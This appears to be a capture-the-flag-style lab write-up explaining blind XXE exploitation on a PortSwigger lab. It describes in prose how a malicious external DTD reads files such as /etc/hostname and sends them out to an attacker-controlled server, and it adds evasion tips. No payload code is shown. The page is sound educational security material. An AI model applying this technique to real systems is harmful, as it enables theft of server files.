Exploitation
Last updated
Last updated
What we did so far was just to ping back our Burp Collab from the remote host, but it actually doesn't tell us how to go on and exploit
this vulnerability
.
Every attacker wants to retrieve any sort of interesting information, this can be achieved using this Blind XXE
But this attack is only possible, when the attacker hosts a malicious DTD on a system that they control
And then invoking the external DTD from within the in-band XXE payload.
It defines an XML parameter entity called file
, which contains /etc/passwd
It again defines another XML parameter called eval
, containing a dynamic declaration of another entity called exfiltrate
The exfiltrate
entity will be evaluated by making an HTTP request to the attacker's web server containing the value of the file
entity within the URL query string
It uses the eval
entity, which invokes the exfiltrate
entity to be performed
It uses the exfiltrate
entity, so that its value is evaluated by requesting the specified URL
The attacker must then host the malicious DTD
on a system that they control, normally by loading it onto their own webserver
Finally the attacker must modify the request to be something like this,
So we just managed to
exfiltrate
thehostname
using a malicious external DTD
When we try to ping back our Burp collab the usual way, it doesn't work so we'll have to try another way to get it
Luckily, PortSwigger labs provide us with an exploit server where we can craft and store our own payload
When we store this payload, notice the URL -> It gives us our malicious DTD
Now we can exploit it the normal way,
And now when we Poll Back
, we notice there is a DNS and an HTTP Response Checking out the HTTP request gives us a GET method containing the hostname
/etc/passwd
doesn't work because of the newline characters in the file, Some XML parsers fetch the URL in the external entity definition using an API
that validates the characters that are allowed to appear within the URL.
It is best to use FTP://
instead of HTTP://
That's why we use files like /etc/hostname